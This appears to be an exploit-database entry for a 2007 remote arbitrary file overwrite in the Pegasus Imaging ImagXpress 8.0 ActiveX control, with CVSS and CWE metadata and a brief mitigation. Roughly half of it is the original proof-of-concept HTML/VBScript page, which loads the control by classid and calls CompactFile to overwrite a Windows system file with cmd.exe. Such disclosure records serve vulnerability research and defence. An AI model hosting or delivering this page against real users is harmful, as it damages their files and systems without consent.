header-logo
Suggest Exploit
vendor:
ImagXpress
by:
shinnai
7.5
CVSS
HIGH
Arbitrary File Overwrite
73
CWE
Product Name: ImagXpress
Affected Version From: 8
Affected Version To: 8.0.41.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2007

Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite

This component contains an insecure 'CompactFile()' method which overwrites arbitrary files on the user's PC. By passing an existing file as the first parameter and a desired file as the second parameter, the desired file will be overwritten.

Mitigation:

Apply the vendor's patch or upgrade to a newer version that addresses the vulnerability. Do not execute code or open files from untrusted sources.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
 <b>Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite</b>
 url: http://www.pegasusimaging.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

 <b>Description:
 Component name: PegasusImaging.ActiveX.ImagXpress8.dll
 Vesrion: 8.0.41.0
 This component contains an insecure "CompactFile()" which overwrites
 arbitrary files on user's pc.
 Passing to the first parameter (sourceFile) of the method an existing
 file as argument (e.g. a well known file as cmd.exe), the file passed
 as argument to the second parameter (destFile) will be overwrite.</b>
-----------------------------------------------------------------------------
<object classid='clsid:6277B638-833D-4315-9D78-60FC451DAF07' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   test.CompactFile "c:\windows\system32\cmd.exe", "c:\windows\system_.ini"
   MsgBox "Exploit completed."
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-10-05]

Navigation

Suggest Exploit

Services By CQR